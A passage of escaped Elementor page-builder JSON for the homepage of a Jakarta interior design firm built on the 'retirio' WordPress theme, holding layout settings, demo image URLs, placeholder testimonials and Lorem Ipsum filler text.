0.32)\"}},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"ae9c19e\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><span style=\\\"font-weight: 400;\\\">Bauhaus Living is Jakarta based interior design consultant &amp; contractor established on 2005. We provide a full range of services of interior design: interior design concept, 3D image, technical drawing and production. <\\/span><\\/p>\",\"_margin\":{\"unit\":\"px\",\"top\":\"10\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"95d1537\",\"elType\":\"widget\",\"settings\":{\"text\":\"More\",\"background_color\":\"#E3B25A\",\"text_padding\":{\"unit\":\"px\",\"top\":\"20\",\"right\":\"40\",\"bottom\":\"20\",\"left\":\"40\",\"isLinked\":false},\"_margin\":{\"unit\":\"px\",\"top\":\"20\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"link\":{\"url\":\"https:\\/\\/bauhaus.futuremediatrix.com\\/about\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]},\"typography_font_weight\":\"700\",\"typography_text_transform\":\"uppercase\",\"border_radius\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true},\"_z_index\":2,\"_transform_keep_proportions_hover\":\"\",\"_transform_skewX_effect_hover\":{\"unit\":\"px\",\"size\":105,\"sizes\":[]},\"__dynamic__\":[]},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"89e3b46\",\"elType\":\"section\",\"settings\":{\"gap\":\"no\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"80\",\"left\":0,\"isLinked\":false},\"padding_tablet\":{\"unit\":\"px\",\"top\":\"90\",\"right\":\"10\",\"bottom\":\"0\",\"left\":\"10\",\"isLinked\":false},\"background_color\":\"#F5F5F5\",\"background_overlay_background\":\"classic\",\"background_overlay_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/background-service-home-1.png\",\"id\":3938,\"alt\":\"\",\"source\":\"library\"},\"background_overlay_position\":\"center center\",\"background_overlay_repeat\":\"no-repeat\",\"background_overlay_size\":\"cover\",\"background_overlay_opacity\":{\"unit\":\"px\",\"size\":0.05,\"sizes\":[]},\"overlay_blend_mode\":\"darken\",\"padding\":{\"unit\":\"px\",\"top\":\"120\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"background_background\":\"classic\"},\"elements\":[{\"id\":\"689d32b\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"6fd54ec\",\"elType\":\"section\",\"settings\":{\"gap\":\"no\",\"structure\":\"20\",\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"25\",\"left\":\"0\",\"isLinked\":false},\"animation\":\"ova-flip\",\"animation_tablet\":\"none\",\"animation_duration\":\"fast\",\"animation_delay\":500},\"elements\":[{\"id\":\"afefcf5\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":57.862},\"elements\":[{\"id\":\"41871d7\",\"elType\":\"widget\",\"settings\":{\"sub_title\":\"SERVICES WE DO\",\"title\":\"\\nOur highlighted services\\nfor interior design\",\"align_heading\":\"left\"},\"elements\":[],\"widgetType\":\"retirio_elementor_heading\"}],\"isInner\":true},{\"id\":\"8ca80a9\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":42.097,\"align\":\"flex-start\",\"margin\":{\"unit\":\"px\",\"top\":\"40\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"30\",\"isLinked\":false},\"margin_mobile\":{\"unit\":\"px\",\"top\":\"40\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"67cca64\",\"elType\":\"widget\",\"settings\":{\"editor\":\"Duis mollis varius quam sed congue. Aliquam porttitor  ultricies porttitor elementum. Nullam pretium id massa ut placerat. Class aptent taciti sociosqu ad litora.\",\"text_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_element_width\":\"auto\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":true}],\"isInner\":true},{\"id\":\"f665bb7\",\"elType\":\"widget\",\"settings\":{\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"-120\",\"left\":\"0\",\"isLinked\":false},\"_animation\":\"pulse\",\"_animation_tablet\":\"none\",\"animation_duration\":\"slow\",\"post_per_page\":3,\"order_by\":\"ova_sev_met_order_sev\",\"order\":\"ASC\"},\"elements\":[],\"widgetType\":\"ovasev_elementor_service_box\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"0da118d\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"5d9734c\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"77ba3ef\",\"elType\":\"widget\",\"settings\":{\"space\":{\"unit\":\"px\",\"size\":100,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"b51484b\",\"elType\":\"section\",\"settings\":{\"layout\":\"full_width\",\"gap\":\"no\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"-15\",\"left\":0,\"isLinked\":false},\"margin_tablet\":{\"unit\":\"px\",\"top\":\"\",\"right\":0,\"bottom\":\"\",\"left\":0,\"isLinked\":true},\"padding_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"3d8a96c\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"0f00906\",\"elType\":\"widget\",\"settings\":{\"sub_title\":\"our recent work\",\"title\":\"Introducing outstanding new projects\"},\"elements\":[],\"widgetType\":\"retirio_elementor_heading\"},{\"id\":\"b4fd990\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"ova_elementor_project_filter_2\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"145a686\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\",\"background_background\":\"classic\",\"background_color\":\"#242424\",\"background_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/bg-whychoose.png\",\"id\":2116,\"alt\":\"\",\"source\":\"library\"},\"background_position\":\"center left\",\"background_repeat\":\"no-repeat\",\"background_size\":\"contain\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false},\"gap\":\"no\",\"padding_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"10\",\"bottom\":\"0\",\"left\":\"10\",\"isLinked\":false}},\"elements\":[{\"id\":\"8460a70\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":45,\"padding\":{\"unit\":\"px\",\"top\":\"110\",\"right\":\"80\",\"bottom\":\"120\",\"left\":\"0\",\"isLinked\":false},\"_inline_size_tablet\":100,\"padding_tablet\":{\"unit\":\"px\",\"top\":\"90\",\"right\":\"0\",\"bottom\":\"90\",\"left\":\"0\",\"isLinked\":false},\"space_between_widgets\":15},\"elements\":[{\"id\":\"5229c85\",\"elType\":\"widget\",\"settings\":{\"sub_title\":\"our benefits\",\"title\":\"Why choose ?\",\"description\":\"There are many variations of passages of Lorem Ipsum available, but the majority have suffered alteration in some form.\\n\",\"align_heading\":\"left\",\"color_title\":\"#FFFFFF\",\"_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"color_sub_title\":\"#B1B1B1\",\"color_description\":\"#C2C2C2\",\"show_line_text\":\"\"},\"elements\":[],\"widgetType\":\"retirio_elementor_heading\"},{\"id\":\"e6bce61\",\"elType\":\"widget\",\"settings\":{\"icon_list\":[{\"text\":\"Architecture business solutions\",\"selected_icon\":{\"value\":\"ovaicon ovaicon-next-5\",\"library\":\"ovaicon\"},\"_id\":\"7113fdf\"},{\"text\":\"Top quality services with reasonable price\",\"selected_icon\":{\"value\":\"ovaicon ovaicon-next-5\",\"library\":\"ovaicon\"},\"_id\":\"e6ab069\"},{\"text\":\"Reliable & experienced architecture & designers\",\"selected_icon\":{\"value\":\"ovaicon ovaicon-next-5\",\"library\":\"ovaicon\"},\"_id\":\"5d551b6\"}],\"icon_color\":\"#E3B25A\",\"icon_size\":{\"unit\":\"px\",\"size\":16,\"sizes\":[]},\"text_color\":\"#FFFFFF\",\"icon_typography_typography\":\"custom\",\"icon_typography_font_size\":{\"unit\":\"px\",\"size\":16,\"sizes\":[]},\"icon_typography_font_weight\":\"600\",\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"16\",\"left\":\"0\",\"isLinked\":false},\"icon_typography_line_height\":{\"unit\":\"em\",\"size\":0.6,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"icon-list\"},{\"id\":\"9c7a64c\",\"elType\":\"widget\",\"settings\":{\"title\":\"Archirecture\",\"percent\":{\"unit\":\"%\",\"size\":80,\"sizes\":[]},\"inner_text\":\"\",\"bar_color\":\"#E3B25A\",\"bar_bg_color\":\"#3A3A3A\",\"bar_height\":{\"unit\":\"px\",\"size\":8,\"sizes\":[]},\"title_color\":\"#FFFFFF\",\"bar_border_radius\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":19,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"progress\"},{\"id\":\"042a87b\",\"elType\":\"widget\",\"settings\":{\"title\":\"Designing\",\"percent\":{\"unit\":\"%\",\"size\":60,\"sizes\":[]},\"inner_text\":\"\",\"bar_color\":\"#E3B25A\",\"bar_bg_color\":\"#3A3A3A\",\"bar_height\":{\"unit\":\"px\",\"size\":8,\"sizes\":[]},\"title_color\":\"#FFFFFF\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":19,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"progress\"}],\"isInner\":false},{\"id\":\"2ae20b7\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":55,\"background_image\":{\"url\":\"\",\"id\":\"\",\"alt\":\"\",\"source\":\"library\"},\"background_position\":\"center center\",\"background_repeat\":\"no-repeat\",\"background_size\":\"contain\",\"css_classes\":\"retirio_stretch_column_right\",\"_inline_size_tablet\":100,\"padding_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"20\",\"bottom\":\"20\",\"left\":\"0\",\"isLinked\":false},\"padding_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"20\",\"bottom\":\"20\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"ca11226\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/image-why-choose.jpg\",\"id\":2090,\"alt\":\"\",\"source\":\"library\"},\"align\":\"right\",\"width_tablet\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"height\":{\"unit\":\"px\",\"size\":580,\"sizes\":[]},\"object-fit_tablet\":\"cover\",\"image_size\":\"full\",\"_transform_transition_hover\":{\"unit\":\"px\",\"size\":800,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"458230c\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_color\":\"#F5F5F5\",\"padding\":{\"unit\":\"px\",\"top\":\"110\",\"right\":\"0\",\"bottom\":\"30\",\"left\":\"0\",\"isLinked\":false},\"padding_tablet\":{\"unit\":\"px\",\"top\":\"80\",\"right\":\"0\",\"bottom\":\"30\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"be465bf\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"0c50faf\",\"elType\":\"widget\",\"settings\":{\"sub_title\":\"Real Testimonials\",\"title\":\"What they\\u2019re talking\\nabout retirio\",\"margin_title\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"-17\",\"left\":\"0\",\"isLinked\":false},\"_padding\":{\"unit\":\"%\",\"top\":\"0\",\"right\":\"25\",\"bottom\":\"0\",\"left\":\"25\",\"isLinked\":false},\"_padding_tablet\":{\"unit\":\"%\",\"top\":\"0\",\"right\":\"10\",\"bottom\":\"0\",\"left\":\"10\",\"isLinked\":false},\"_padding_mobile\":{\"unit\":\"%\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true},\"_animation\":\"fadeInUp\",\"_animation_tablet\":\"none\"},\"elements\":[],\"widgetType\":\"retirio_elementor_heading\"},{\"id\":\"27fa0e5\",\"elType\":\"widget\",\"settings\":{\"version\":\"version_1\",\"tab_item\":[{\"name_author\":\"Kevin martin\",\"job\":\"Our customer\",\"testimonial\":\"Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.\",\"_id\":\"4735f8c\",\"image_author\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/kevin-martin.jpg\",\"id\":1415,\"alt\":\"\",\"source\":\"library\"},\"background_image_background\":\"classic\",\"background_image_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/Base.png\",\"id\":1421,\"alt\":\"\",\"source\":\"library\"},\"background_image_position\":\"initial\",\"background_image_position_tablet\":\"initial\",\"background_image_position_mobile\":\"initial\",\"background_image_xpos\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"background_image_xpos_tablet\":{\"unit\":\"px\",\"size\":45,\"sizes\":[]},\"background_image_xpos_mobile\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"background_image_ypos\":{\"unit\":\"%\",\"size\":103,\"sizes\":[]},\"background_image_ypos_tablet\":{\"unit\":\"%\",\"size\":0,\"sizes\":[]},\"background_image_repeat\":\"no-repeat\",\"background_image_repeat_mobile\":\"no-repeat\",\"background_image_size\":\"contain\",\"background_image_size_tablet\":\"cover\",\"background_image_size_mobile\":\"cover\",\"background_color_item\":\"#1B1B1B\"},{\"name_author\":\"Jessica brown \",\"job\":\"Our customer\",\"testimonial\":\"Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.\",\"_id\":\"71b5562\",\"image_author\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/jessica.jpg\",\"id\":1416,\"alt\":\"\",\"source\":\"library\"},\"background_image_background\":\"classic\",\"background_image_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/background-line-yellow.png\",\"id\":1422,\"alt\":\"\",\"source\":\"library\"},\"background_color_item\":\"#DDAD58\"},{\"name_author\":\"Mike hardson\",\"job\":\"Our customer\",\"testimonial\":\"Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.\",\"_id\":\"705dd08\",\"image_author\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/mike-hardson.jpg\",\"id\":1417,\"alt\":\"\",\"source\":\"library\"},\"background_image_background\":\"classic\",\"background_image_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/Base.png\",\"id\":1421,\"alt\":\"\",\"source\":\"library\"},\"background_image_repeat\":\"no-repeat\",\"background_image_size\":\"contain\",\"background_color_item\":\"#1B1B1B\"},{\"name_author\":\"Kevin martin\",\"job\":\"Our customer\",\"testimonial\":\"Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.\",\"image_author\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/kevin-martin.jpg\",\"id\":1415,\"alt\":\"\",\"source\":\"library\"},\"background_image_background\":\"classic\",\"background_image_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/Base.png\",\"id\":1421,\"alt\":\"\",\"source\":\"library\"},\"background_image_position\":\"initial\",\"background_image_position_tablet\":\"initial\",\"background_image_position_mobile\":\"initial\",\"background_image_xpos\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"background_image_xpos_tablet\":{\"unit\":\"px\",\"size\":45,\"sizes\":[]},\"background_image_xpos_mobile\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"background_image_ypos\":{\"unit\":\"%\",\"size\":103,\"sizes\":[]},\"background_image_ypos_tablet\":{\"unit\":\"%\",\"size\":0,\"sizes\":[]},\"background_image_repeat\":\"no-repeat\",\"background_image_repeat_mobile\":\"no-repeat\",\"background_image_size\":\"contain\",\"background_image_size_tablet\":\"cover\",\"background_image_size_mobile\":\"cover\",\"background_color_item\":\"#1B1B1B\",\"_id\":\"8eb7d44\"},{\"name_author\":\"Mike hardson\",\"job\":\"Our customer\",\"testimonial\":\"Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.\",\"image_author\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/mike-hardson.jpg\",\"id\":1417,\"alt\":\"\",\"source\":\"library\"},\"background_image_background\":\"classic\",\"background_image_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/Base.png\",\"id\":1421,\"alt\":\"\",\"source\":\"library\"},\"background_image_repeat\":\"no-repeat\",\"background_image_size\":\"contain\",\"background_color_item\":\"#1B1B1B\",\"_id\":\"23b7d8f\"},{\"name_author\":\"Kevin martin\",\"job\":\"Our customer\",\"testimonial\":\"Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.\",\"image_author\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/kevin-martin.jpg\",\"id\":1415,\"alt\":\"\",\"source\":\"library\"},\"background_image_background\":\"classic\",\"background_image_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/Base.png\",\"id\":1421,\"alt\":\"\",\"source\":\"library\"},\"background_image_position\":\"initial\",\"background_image_position_tablet\":\"initial\",\"background_image_position_mobile\":\"initial\",\"background_image_xpos\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"background_image_xpos_tablet\":{\"unit\":\"px\",\"size\":45,\"sizes\":[]},\"background_image_xpos_mobile\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"background_image_ypos\":{\"unit\":\"%\",\"size\":103,\"sizes\":[]},\"background_image_ypos_tablet\":{\"unit\":\"%\",\"size\":0,\"sizes\":[]},\"background_image_repeat\":\"no-repeat\",\"background_image_repeat_mobile\":\"no-repeat\",\"background_image_size\":\"contain\",\"background_image_size_tablet\":\"cover\",\"background_image_size_mobile\":\"cover\",\"background_color_item\":\"#1B1B1B\",\"_id\":\"6c7e338\"}],\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"-280\",\"left\":\"0\",\"isLinked\":false},\"icon_quote\":{\"value\":\"flaticon flaticon-quotes\",\"library\":\"flaticon\"},\"tab_item_v2\":[{\"name_author\":\"Kevin martin\",\"job\":\"Our customer\",\"testimonial\":\"Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.\",\"_id\":\"cf6d2b9\"},{\"name_author\":\"Jessica brown \",\"job\":\"Our customer\",\"testimonial\":\"Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.\",\"_id\":\"e73dd09\"},{\"name_author\":\"Mike hardson\",\"job\":\"Our customer\",\"testimonial\":\"Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.\",\"_id\":\"127b5e7\"}],\"tab_item_v3\":[{\"name_author\":\"Kevin martin\",\"job\":\"Customer\",\"testimonial\":\"This is due to their excellent service, competitive pricing and customer support. It\\u2019s throughly refresing to get such a personal touch. Duis aute lorem ipsum is simply free text irure dolor in velit esse.\",\"_id\":\"163297c\"},{\"name_author\":\"Jessica brown \",\"job\":\"Customer\",\"testimonial\":\"This is due to their excellent service, competitive pricing and customer support. It\\u2019s throughly refresing to get such a personal touch. Duis aute lorem ipsum is simply free text irure dolor in velit esse.\",\"_id\":\"bcfaaf7\"},{\"name_author\":\"Mike hardson\",\"job\":\"Customer\",\"testimonial\":\"This is due to their excellent service, competitive pricing and customer support. It\\u2019s throughly refresing to get such a personal touch. Duis aute lorem ipsum is simply free text irure dolor in velit esse.\",\"_id\":\"80c4005\"}],\"icon_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]},\"dot_control\":\"yes\",\"_animation\":\"bounceInUp\",\"autoplay\":\"\"},\"elements\":[],\"widgetType\":\"retirio_elementor_testimonial\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"f7c9652\",\"elType\":\"section\",\"settings\":{\"padding\":{\"unit\":\"px\",\"top\":\"327\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"padding_tablet\":{\"unit\":\"px\",\"top\":\"297\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"77dbf66\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"080887e\",\"elType\":\"widget\",\"settings\":{\"sub_title\":\"Our process\",\"title\":\"4 easy work steps\",\"_animation\":\"ova-move-down\",\"_margin_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"60\",\"left\":\"0\",\"isLinked\":false},\"_animation_tablet\":\"none\",\"animation_duration\":\"fast\",\"_animation_delay\":100},\"elements\":[],\"widgetType\":\"retirio_elementor_heading\"},{\"id\":\"ec83ee9\",\"elType\":\"section\",\"settings\":{\"structure\":\"40\",\"margin\":{\"unit\":\"px\",\"top\":\"50\",\"right\":0,\"bottom\":\"120\",\"left\":0,\"isLinked\":false},\"margin_tablet\":{\"unit\":\"px\",\"top\":\"50\",\"right\":0,\"bottom\":\"90\",\"left\":0,\"isLinked\":false},\"margin_mobile\":{\"unit\":\"px\",\"top\":\"40\",\"right\":0,\"bottom\":\"30\",\"left\":0,\"isLinked\":false},\"padding_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"10\",\"bottom\":\"0\",\"left\":\"10\",\"isLinked\":false}},\"elements\":[{\"id\":\"a992324\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null,\"margin_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"animation\":\"fadeInDown\",\"animation_tablet\":\"none\",\"background_background\":\"classic\",\"background_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/line-1.png\",\"id\":3838,\"alt\":\"\",\"source\":\"library\"},\"background_position\":\"initial\",\"background_xpos\":{\"unit\":\"px\",\"size\":60,\"sizes\":[]},\"background_repeat\":\"no-repeat\",\"padding\":{\"unit\":\"px\",\"top\":\"65\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_inline_size_tablet\":50,\"align_tablet\":\"center\",\"background_position_tablet\":\"initial\",\"background_xpos_tablet\":{\"unit\":\"px\",\"size\":150,\"sizes\":[]},\"background_xpos_mobile\":{\"unit\":\"%\",\"size\":-1000,\"sizes\":[]},\"background_ypos_mobile\":{\"unit\":\"%\",\"size\":-1000,\"sizes\":[]},\"margin_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"30\",\"left\":\"0\",\"isLinked\":false},\"content_position_tablet\":\"top\",\"padding_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"background_ypos\":{\"unit\":\"px\",\"size\":-1,\"sizes\":[]}},\"elements\":[{\"id\":\"fd3636d\",\"elType\":\"widget\",\"settings\":{\"text\":\"Design\\nconcept \\n\",\"numerical_order\":\"01\",\"top_order\":{\"unit\":\"px\",\"size\":-24,\"sizes\":[]},\"right_order\":{\"unit\":\"px\",\"size\":-80,\"sizes\":[]},\"_element_width_mobile\":\"auto\",\"bottom_mobile\":{\"unit\":\"px\",\"size\":175,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"retirio_elementor_ova_icon_box_2\"}],\"isInner\":true},{\"id\":\"b9984a7\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null,\"animation\":\"fadeInDown\",\"animation_tablet\":\"none\",\"background_background\":\"classic\",\"background_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/line-2.png\",\"id\":3839,\"alt\":\"\",\"source\":\"library\"},\"background_position\":\"initial\",\"background_xpos\":{\"unit\":\"px\",\"size\":45,\"sizes\":[]},\"background_xpos_tablet\":{\"unit\":\"px\",\"size\":45,\"sizes\":[]},\"background_xpos_mobile\":{\"unit\":\"%\",\"size\":-1000,\"sizes\":[]},\"background_ypos\":{\"unit\":\"px\",\"size\":135,\"sizes\":[]},\"background_ypos_tablet\":{\"unit\":\"px\",\"size\":140,\"sizes\":[]},\"background_ypos_mobile\":{\"unit\":\"%\",\"size\":-1000,\"sizes\":[]},\"background_repeat\":\"no-repeat\",\"padding\":{\"unit\":\"px\",\"top\":\"55\",\"right\":\"0\",\"bottom\":\"65\",\"left\":\"0\",\"isLinked\":false},\"_inline_size_tablet\":50,\"align_tablet\":\"center\",\"margin_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"30\",\"left\":\"0\",\"isLinked\":false},\"content_position_tablet\":\"bottom\",\"background_position_tablet\":\"initial\",\"margin_mobile\":{\"unit\":\"px\",\"top\":\"120\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"padding_tablet\":{\"unit\":\"px\",\"top\":\"60\",\"right\":\"0\",\"bottom\":\"60\",\"left\":\"0\",\"isLinked\":false},\"padding_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"animation_delay\":250},\"elements\":[{\"id\":\"aba257a\",\"elType\":\"widget\",\"settings\":{\"icon\":{\"value\":\"flaticon flaticon-interior-design\",\"library\":\"flaticon\"},\"text\":\"Design\\nschematic \\n\",\"numerical_order\":\"02\",\"text_position\":\"top-left\",\"_element_width_mobile\":\"auto\"},\"elements\":[],\"widgetType\":\"retirio_elementor_ova_icon_box_2\"}],\"isInner\":true},{\"id\":\"24d2339\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null,\"margin_mobile\":{\"unit\":\"px\",\"top\":\"60\",\"right\":\"0\",\"bottom\":\"60\",\"left\":\"0\",\"isLinked\":false},\"animation\":\"fadeInDown\",\"animation_tablet\":\"none\",\"background_background\":\"classic\",\"background_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/line-1.png\",\"id\":3838,\"alt\":\"\",\"source\":\"library\"},\"background_position\":\"initial\",\"background_xpos\":{\"unit\":\"px\",\"size\":57,\"sizes\":[]},\"background_repeat\":\"no-repeat\",\"padding\":{\"unit\":\"px\",\"top\":\"65\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_inline_size_tablet\":50,\"align_tablet\":\"center\",\"background_position_tablet\":\"initial\",\"background_xpos_tablet\":{\"unit\":\"px\",\"size\":60,\"sizes\":[]},\"margin_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"30\",\"left\":\"0\",\"isLinked\":false},\"content_position_tablet\":\"top\",\"background_xpos_mobile\":{\"unit\":\"%\",\"size\":-1000,\"sizes\":[]},\"background_ypos_mobile\":{\"unit\":\"%\",\"size\":-1000,\"sizes\":[]},\"animation_delay\":500},\"elements\":[{\"id\":\"0f2ef7d\",\"elType\":\"widget\",\"settings\":{\"icon\":{\"value\":\"flaticon 